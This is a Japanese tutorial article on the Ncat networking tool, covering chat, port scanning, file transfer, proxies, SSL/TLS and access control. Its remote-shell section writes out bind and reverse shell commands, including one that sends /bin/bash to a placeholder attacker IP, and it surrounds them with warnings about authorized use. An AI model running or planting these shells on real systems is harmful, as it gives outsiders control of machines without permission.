Ncat (nc): ネットワークの万能ナイフを使いこなす

TCP/UDP通信、ポートスキャン、ファイル転送、リモートシェルなど、Ncatの強力な機能を徹底解説！

はじめに
基本的な使い方
応用的な使い方
NcatとNetcat (nc) の違い
注意点とセキュリティ
まとめ
- 参考情報

はじめに

ncat（エヌキャット）は、ネットワークを通じてデータを読み書きするための強力なコマンドラインユーティリティです。もともと「ネットワークのスイスアーミーナイフ」として知られる netcat (nc) の後継として、Nmapプロジェクトによって開発されました。Ncatは、オリジナルのNetcatの機能を引き継ぎつつ、SSL/TLS暗号化、IPv6サポート、プロキシ接続、アクセス制御など、多くの新機能と改善が加えられています。Kali Linuxなどのペネトレーションテスト用ディストリビューションには標準で含まれており、ネットワーク管理者やセキュリティ専門家にとって不可欠なツールの一つとなっています。

Ncatは非常に多機能で、以下のような様々な用途に利用できます。

TCP/UDP通信のテスト・デバッグ: クライアントとしてもサーバーとしても動作し、任意のポートで通信内容を確認できます。
ポートスキャン: 指定したホストのポートが開いているかを確認できます。（ただし、より高機能なポートスキャンにはNmap本体の使用が推奨されます）
ファイル転送: マシン間で簡単にファイルを送受信できます。
リモートシェル (バックドア): ターゲットマシン上でコマンドを実行するためのシェルを確立できます。（セキュリティリスクが高いため注意が必要です）
プロキシ機能: HTTPやSOCKSプロキシとして動作させたり、他のプロキシを経由して通信したりできます。
通信の中継 (ブローカーモード): NAT環境下など直接通信できないマシン間での通信を中継できます。

この記事では、Ncatの基本的な使い方から応用的なテクニックまで、具体的なコマンド例を交えながら詳しく解説していきます。ネットワークのトラブルシューティングやセキュリティテストにぜひ役立ててください。

注意

Ncatは非常に強力なツールですが、使い方によってはセキュリティリスクを伴います。特にリモートシェル機能は、不正アクセスに悪用される可能性があります。許可されたネットワークやシステム、またはテスト環境でのみ使用し、倫理的な利用を心がけてください。

多くのLinuxディストリビューションでは、ncatコマンドはnmap-ncatパッケージに含まれています。インストールされていない場合は、パッケージマネージャー (apt, yum, dnfなど) を使ってインストールできます。また、ncコマンドがncatへのシンボリックリンクとして設定されていることもあります。バージョンを確認するにはncat -Vまたはnc -Vを実行します。

# Debian/Ubuntu系の場合
sudo apt update && sudo apt install nmap nmap-ncat

# RHEL/CentOS系の場合
sudo yum update && sudo yum install nmap nmap-ncat
# または
sudo dnf update && sudo dnf install nmap nmap-ncat

# バージョン確認
ncat -V
# または
nc -V

基本的な使い方

Ncatの基本的な動作モードは「コネクトモード (クライアント)」と「リッスンモード (サーバー)」の2つです。デフォルトではTCPプロトコルを使用します。

TCP/UDPサーバー (リッスンモード) の起動

特定のポートで接続を待ち受けるサーバーとして動作させるには、-l (または --listen) オプションを使用します。ポート番号を指定しない場合、デフォルトで 31337 番ポートを使用します。

# TCPポート12345で接続を待ち受ける
ncat -l 12345

# 詳細情報を表示 (-v: verbose)
ncat -lv 12345

# UDPポート12345で接続を待ち受ける (-u: UDP)
ncat -lu 12345

# ポート番号を明示的に指定 (-p: port)
ncat -lp 12345

# 接続が切断されても待ち受けを続ける (-k: keep-open)
# デフォルトでは一度接続が切れると終了する
ncat -lk 12345

-v オプションを付けると、接続の試行や確立などの詳細情報が表示されるため、デバッグに役立ちます。-k オプションは、クライアントが切断した後もサーバーが終了せず、次の接続を待ち続けるようにします。簡易的なチャットサーバーなどで便利です。

TCP/UDPクライアントとしての接続

動作中のサーバーに接続するには、接続先のホスト名またはIPアドレスとポート番号を指定します。

# 192.168.1.100のTCPポート12345に接続
ncat 192.168.1.100 12345

# 詳細情報を表示
ncat -v 192.168.1.100 12345

# example.comのUDPポート53 (DNS) に接続
ncat -u example.com 53

接続が成功すると、標準入力からのデータがサーバーに送信され、サーバーからのデータが標準出力に表示されます。Ctrl+C で接続を終了します。

簡単なチャットシステム

Ncatを使えば、簡単に2台のマシン間でテキストチャットを行うことができます。

サーバー側 (例: 192.168.1.100):

# ポート12345で待ち受け、接続後も待ち受けを続ける
ncat -lk 12345

クライアント側 (例: 192.168.1.200):

# サーバーに接続
ncat 192.168.1.100 12345

これで、どちらかの端末で入力したテキストが、もう一方の端末にリアルタイムで表示されるようになります。複数クライアントが接続できるようにするには、サーバー側でブローカーモード (--broker) やチャットモード (--chat) を使う方法もあります (後述)。

応用的な使い方

Ncatはその多機能性から、様々な応用が可能です。ここではいくつかの代表的な使い方を紹介します。

ポートスキャン

-z オプションを使うと、接続を確立せずにポートが開いているかどうかの確認 (ポートスキャン) ができます。I/Oを行わないため “Zero-I/O mode” と呼ばれます。TCPスキャンがデフォルトで、UDPスキャンには -u オプションを併用します。-v オプションで結果を詳細表示し、-w <秒数> (または --wait <秒数>) でタイムアウト時間を指定できます。

# 192.168.1.1のTCPポート80 (HTTP) が開いているか確認 (タイムアウト1秒)
ncat -zv -w 1 192.168.1.1 80

# 192.168.1.1のTCPポート範囲 20-30 をスキャン
ncat -zv -w 1 192.168.1.1 20-30

# 192.168.1.1のUDPポート53 (DNS) が開いているか確認
ncat -uzv -w 2 192.168.1.1 53

Nmapとの比較

Ncatでも簡易的なポートスキャンは可能ですが、本格的なポートスキャン、OS検出、サービスバージョン検出などを行いたい場合は、Nmap本体を使用する方がはるかに高機能で効率的です。Ncatの-zオプションは、主に特定のポートの疎通確認に用いられます。

ファイル転送

Ncatとリダイレクト (<, >) を組み合わせることで、簡単にファイル転送が行えます。

受信側 (サーバー):

# ポート5555で待ち受け、受信したデータを output.dat に保存
ncat -lp 5555 > output.dat

送信側 (クライアント):

# input.dat の内容を サーバーのIP:5555 に送信
# --send-only をつけると、ファイル送信完了後に接続を閉じる
ncat --send-only サーバーのIP 5555 < input.dat

逆に、サーバー側からクライアントへファイルを送信することも可能です。

送信側 (サーバー):

# ポート5555で待ち受け、接続があったら file_to_send.zip を送信
# -k なしの場合、1回の転送で終了
ncat -lp 5555 < file_to_send.zip

受信側 (クライアント):

# サーバーのIP:5555 に接続し、受信データを received_file.zip に保存
ncat サーバーのIP 5555 > received_file.zip

注意

この方法でのファイル転送は暗号化されません。機密性の高いファイルを転送する場合は、後述するSSL/TLSオプションを使用するか、SCPやSFTPなど他の安全な方法を利用してください。また、大容量ファイルの転送では、ネットワーク帯域や安定性を考慮する必要があります。

リモートシェル (バックドア)

Ncatは、リモートマシン上でコマンドを実行するためのシェルを確立する機能を持っています。これは非常に強力ですが、悪用される危険性が極めて高い機能です。セキュリティテストや正当な管理目的以外での使用は絶対に避けてください。リモートシェルには主に「バインドシェル」と「リバースシェル」の2種類があります。

バインドシェル (Bind Shell)

バインドシェルは、ターゲットマシン (サーバー側) が特定のポートで待ち受け、接続してきたクライアントに対してシェルを提供する方式です。-e <コマンド> (または --exec <コマンド>) オプションを使用します。

ターゲットマシン (サーバー側):

# ポート4444で待ち受け、接続があったら /bin/bash を起動して提供
ncat -lvkp 4444 -e /bin/bash
# Windowsの場合
# ncat -lvkp 4444 -e cmd.exe

攻撃者マシン (クライアント側):

# ターゲットマシンのポート4444に接続
ncat -v ターゲットIP 4444

接続が成功すると、攻撃者マシンからターゲットマシンのコマンドを実行できるようになります。しかし、この方式はターゲットマシン側でポートを開けて待ち受けるため、ファイアウォールでブロックされやすいという欠点があります。

リバースシェル (Reverse Shell)

リバースシェルは、ターゲットマシン (クライアント側) から攻撃者マシン (サーバー側) へ接続を開始し、シェルを提供する方式です。ファイアウォールのアウトバウンド通信は比較的許可されていることが多いため、バインドシェルよりも成功しやすい場合があります。

攻撃者マシン (サーバー側):

# ポート4444で接続を待ち受ける
ncat -lvp 4444

ターゲットマシン (クライアント側):

# 攻撃者マシンのポート4444に接続し、/bin/bash を提供
ncat -v 攻撃者IP 4444 -e /bin/bash
# Windowsの場合
# ncat -v 攻撃者IP 4444 -e cmd.exe

ターゲットマシン側でコマンドが実行されると、攻撃者マシンのNcatセッションに接続され、コマンド実行が可能になります。

重大なセキュリティリスク

バインドシェル、リバースシェルともに、システムの制御を奪取される可能性がある非常に危険な機能です。これらのコマンドは、ペネトレーションテストの学習や、許可された環境でのセキュリティ評価目的でのみ使用してください。実稼働環境で不用意に実行すると、深刻なセキュリティインシデントにつながる可能性があります。

プロキシ機能

Ncatは、自身がプロキシサーバーとして動作したり、他のプロキシサーバーを経由して通信したりする機能も持っています。

# HTTPプロキシとしてポート8080で待ち受ける
ncat -l 8080 --proxy-type http

# SOCKS4プロキシとしてポート1080で待ち受ける
ncat -l 1080 --proxy-type socks4

# 指定したHTTPプロキシ (proxy.example.com:8080) を経由して target.com:80 に接続
ncat --proxy proxy.example.com:8080 --proxy-type http target.com 80

# 認証が必要なSOCKS5プロキシを経由して接続
ncat --proxy socks-proxy.example.com:1080 --proxy-type socks5 --proxy-auth user:password target.com 80

--proxy-type でプロキシの種類 (http, socks4, socks5) を指定し、--proxy でプロキシサーバーのアドレスとポートを指定します。認証が必要な場合は --proxy-auth でユーザー名とパスワードを指定します。SSH接続などでプロキシを経由させたい場合に便利です。

SSL/TLS通信

--ssl オプションを使用することで、通信をSSL/TLSで暗号化できます。これにより、ファイル転送やチャットなどの通信内容を保護できます。

サーバー側 (自己署名証明書を使用):

# 事前にopensslなどでサーバー証明書 (cert.pem) と秘密鍵 (key.pem) を作成しておく
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes -subj "/CN=localhost"

# SSLを有効にしてポート9999で待ち受け
ncat -l --ssl --ssl-cert cert.pem --ssl-key key.pem 9999

クライアント側:

# SSLでサーバーに接続 (証明書の検証は行わない)
ncat --ssl サーバーIP 9999

# サーバー証明書を検証する場合 (サーバーのCNが server.example.com であると仮定)
# ca.pem はサーバー証明書を発行したCA証明書、または自己署名証明書そのもの
ncat --ssl --ssl-verify --ssl-trustfile ca.pem server.example.com 9999

--ssl-cert と --ssl-key でサーバー証明書と秘密鍵を指定します。クライアント側で --ssl-verify を使用すると、サーバー証明書の検証を行います。その際、--ssl-trustfile で信頼するCA証明書またはサーバーの自己署名証明書を指定する必要があります。

アクセス制御

リッスンモードで動作している際に、接続を許可または拒否するホストを指定できます。

# 192.168.1.10 からの接続のみ許可
ncat -l --allow 192.168.1.10 1234

# 192.168.1.0/24 ネットワークからの接続を許可
ncat -l --allow 192.168.1.0/24 1234

# 10.0.0.5 からの接続を拒否 (他の接続は許可)
ncat -l --deny 10.0.0.5 1234

# allowlist.txt に記載されたホストからの接続のみ許可
ncat -l --allowfile allowlist.txt 1234

# denylist.txt に記載されたホストからの接続を拒否
ncat -l --denyfile denylist.txt 1234

--allow, --deny オプションでは、ホスト名、IPアドレス、CIDR形式のネットワークアドレスを指定できます。--allowfile, --denyfile では、許可/拒否するホストリストをファイルから読み込みます。

コマンド実行 (-c, –sh-exec)

-e (--exec) と似ていますが、-c <コマンド文字列> (または --sh-exec <コマンド文字列>) は、接続が確立された際に、指定したコマンド文字列をシステムのデフォルトシェル (通常は /bin/sh) を介して実行します。

サーバー側:

# ポート7777で待ち受け、接続があったら `ls -l /tmp` を実行し結果を返す
ncat -lkp 7777 -c 'ls -l /tmp'

クライアント側:

# サーバーに接続 (接続するとサーバー側でコマンドが実行され、結果が返ってくる)
ncat サーバーIP 7777

-e が指定したプログラムを直接実行するのに対し、-c はシェルを経由するため、パイプやリダイレクトを含む複雑なコマンドラインを実行させたい場合に便利です。ただし、これもリモートシェルと同様にセキュリティリスクを伴います。

NcatとNetcat (nc) の違い

ncat は netcat (nc) の後継として開発されましたが、いくつかの重要な違いがあります。

機能	Ncat (Nmap Project)	Netcat (オリジナル/OpenBSD版など)
開発元	Nmap Project	Hobbit (オリジナル), OpenBSD Project など
SSL/TLSサポート	あり (`--ssl` など)	なし (一部派生版を除く)
IPv6サポート	あり (デフォルトで対応, `-4`/`-6` で強制)	限定的またはなし (実装による)
プロキシサポート	あり (HTTP, SOCKS4, SOCKS5, `--proxy` など)	なし (一部派生版を除く)
アクセス制御	あり (`--allow`, `--deny` など)	なし
ブローカー/チャットモード	あり (`--broker`, `--chat`)	なし
コマンド実行	`-e`, `--exec`, `-c`, `--sh-exec`	`-e` (実装による、セキュリティリスクのため削除されている場合も多い)
ポートスキャン	`-z` (簡易的な機能)	`-z` (実装による)
ライセンス	Nmap Public Source License (NPSL)	様々 (オリジナルはPublic Domainに近いが不明瞭, OpenBSD版はBSDライセンス)
その他	Nmapライブラリを利用し、より堅牢で高機能	シンプル、軽量

どちらを使うべきか？

多くの場合、機能が豊富でセキュリティ機能 (SSL/TLS, アクセス制御) も備わっている Ncat の使用が推奨されます。特に、暗号化通信やプロキシ経由の接続が必要な場合、Ncatが適しています。

一方で、非常に古いシステムや組み込み環境で、リソースが極端に限られている場合や、オリジナルのNetcatの特定の挙動に依存するスクリプトがある場合は、従来のNetcat (nc) が選択肢になることもあります。ただし、多くのモダンなLinuxディストリビューションでは nc コマンドが ncat へのシンボリックリンクになっていることが多いです。

コマンドオプションにも互換性のない部分があるため、スクリプトなどで使用する場合は、どちらのコマンドを対象としているかを意識する必要があります。

注意点とセキュリティ

Ncatはその強力さゆえに、利用には十分な注意が必要です。

リモートシェルの危険性: -e や -c オプションは、システムの制御を外部に与えることを可能にします。これは、攻撃者によってバックドアとして悪用される典型的な手口です。許可なく他者のシステムに対してこれらのオプションを使用することは、不正アクセス行為にあたります。
暗号化されていない通信: デフォルトでは、Ncatの通信は暗号化されません。ファイル転送やチャットなどで送受信されるデータは、ネットワーク上で盗聴される可能性があります。機密情報を扱う場合は、必ず --ssl オプションを使用するか、VPNなどの他の暗号化手段を併用してください。
ファイアウォールとIDS/IPS: Ncatによる不審な通信 (特定のポートへの接続試行、リモートシェルの確立など) は、ファイアウォールや侵入検知システム (IDS/IPS) によって検知・ブロックされる可能性があります。セキュリティテストを行う際は、これらの防御機構の存在を考慮に入れる必要があります。
意図しないポートの開放: リッスンモード (-l) を使用する際は、意図しないポートを不用意に開放しないように注意が必要です。特に -k オプションを併用すると、プロセスが終了するまでポートが開き続けるため、管理が重要になります。
倫理的な利用: Ncatはネットワークの診断や管理、セキュリティテストに非常に有用なツールですが、その能力を悪用することも可能です。常に法律と倫理規範を遵守し、許可された範囲でのみ使用してください。

Ncatを安全かつ効果的に活用するためには、ネットワークとセキュリティの基本的な知識が不可欠です。ツールの機能だけでなく、それがもたらす影響と潜在的なリスクを理解した上で利用することが重要です。

まとめ

Ncatは、TCP/UDP通信のテスト、ファイル転送、ポートスキャン、リモートシェル、プロキシ機能、SSL/TLS暗号化など、多岐にわたる機能を提供する非常に強力なネットワークユーティリティです。その柔軟性と多機能性から「ネットワークのスイスアーミーナイフ」と称されるNetcatの正当な後継であり、現代的なネットワーク環境に対応するための多くの改良が加えられています。

基本的な接続テストから、ファイル転送、シェルアクセス、暗号化通信まで、Ncatを使いこなすことで、ネットワーク関連の様々なタスクを効率的に行うことができます。しかし、その強力さゆえに、特にリモートシェル機能などの悪用には十分注意し、常にセキュリティと倫理を意識して利用する必要があります。

この記事で紹介した内容はNcatの機能の一部です。より詳細な情報や高度な使い方については、公式ドキュメントを参照することをお勧めします。

参考情報

Ncat 公式ページ (Nmapプロジェクト内): https://nmap.org/ncat/
Ncat ユーザーズガイド (英語): https://nmap.org/ncat/guide/index.html
Kali Linux Tools – nmap (ncat含む): https://www.kali.org/tools/nmap/

Ncatをマスターして、ネットワークの世界をより深く探求しましょう！